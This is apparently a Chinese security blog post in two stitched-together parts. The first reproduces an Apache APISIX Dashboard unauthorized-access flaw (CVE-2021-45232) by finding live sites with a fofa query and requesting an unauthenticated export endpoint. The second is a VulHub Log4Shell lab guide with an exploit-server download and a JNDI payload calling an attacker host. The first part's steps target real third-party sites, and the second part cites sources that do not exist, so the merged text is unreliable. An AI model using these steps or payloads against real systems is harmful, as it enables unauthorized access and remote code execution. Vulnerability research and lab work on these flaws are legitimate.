Apache APISIX Dashboard 未授权访问(CVE-2021-45232 )

一、漏洞原理

Apache APISIX是一个实时、动态、高性能的API网关。Apache APISIX Dashboard旨在让用户尽可能容易地通过前端界面来操作Apache APISIX。

2021年12月27日,Apache官方发布安全通告,Apache APISIX Dashboard中存在一个未授权访问漏洞(CVE-2021-45232)。

在2.10.1之前的Apache APISIX Dashboard中,Manager API使用了两个框架,在框架 "gin "的基础上引入了框架 "droplet"。所有API和认证中间件都是基于框架 "droplet "开发的,但有些API直接使用了框架"gin "的接口,从而绕过身份验证,导致未授权访问。

二、影响范围

Apache APISIX Dashboard < 2.10.1

三、漏洞复现

好啦,我们来进行漏洞复现,非常简单

利用fofa语句:title="Apache APISIX Dashboard"

找到一个网站

用bp抓包,在数据包中添加/apisix/admin/migrate/export ,放包,返回相关信息。

 

 四、漏洞修复建议

目前此漏洞已经修复,建议受影响用户尽快升级更新至Apache APISIX Dashboard 2.10.1版本。

下载链接:

https://github.com/apache/apisix-dashboard/releases

缓解措施:

更改默认用户名和密码,限制源IP访问 Apache APISIX Dashboard。

### CVE-2021-44228 漏洞复现环境搭建教程 #### 一、概述 CVE-2021-44228 是 Log4j2 的远程代码执行漏洞,影响范围广泛。为了研究该漏洞的工作原理及其潜在风险,可以通过 VulHub 靶场来快速构建复现环境。 --- #### 二、VulHub 环境准备 VulHub 是一个基于 Docker 和 Docker Compose 构建的安全漏洞学习平台,提供了多种常见漏洞的复现环境。以下是针对 CVE-2021-44228 的具体操作步骤: 1. **安装依赖工具** - 安装 Docker 和 Docker Compose 工具。 - 确保系统已正确配置并运行 `docker` 和 `docker-compose` 命令[^2]。 2. **克隆 VulHub 仓库** 使用 Git 将 VulHub 项目克隆到本地: ```bash git clone https://github.com/vulhub/vulhub.git ``` 3. **切换至目标目录** 进入 CVE-2021-44228 对应的文件夹路径: ```bash cd vulhub/log4j/CVE-2021-44228/ ``` 4. **启动容器服务** 执行以下命令以启动所需的容器服务: ```bash docker-compose up -d ``` 此时会自动拉取必要的镜像并初始化环境。完成后可以访问 http://<your-ip>:8983 来查看 Apache Solr 的管理界面[^4]。 5. **验证环境状态** 如果一切正常,应该能够看到 Solr Dashboard 页面加载成功。这表明漏洞复现所需的服务已经就绪。 --- #### 三、漏洞利用测试 完成上述准备工作之后,可按照如下方法尝试触发 JNDI 注入攻击向量: 1. 下载用于模拟恶意行为的 Exploit 工具包: ```bash wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/jndi-exploit-server.jar ``` 2. 启动监听端口等待连接求到来: ```bash java -jar jndi-exploit-server.jar <local-ip> ``` 3. 修改日志记录语句使其包含特定 payload 数据结构形式,例如 `${jndi:ldap://<attacker-ip>/a}` 并发送给目标应用程序处理逻辑部分去解析它从而实现 RCE 效果[^5]。 --- #### 四、清理工作 实验结束后务必及时停止所有正在运行中的实例资源以免造成不必要的安全隐患或者性能消耗等问题发生: ```bash docker-compose down ``` 此命令将会终止当前 session 中所有的关联进程并将它们移除掉同时释放所占用的相关物理硬件设备上的存储空间位置等宝贵计算资源[^3]。 --- ### 注意事项 - 实验应在隔离环境中进行,切勿对外网开放任何敏感接口。 - 测试完毕后需立即删除相关数据以防泄露隐私信息。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值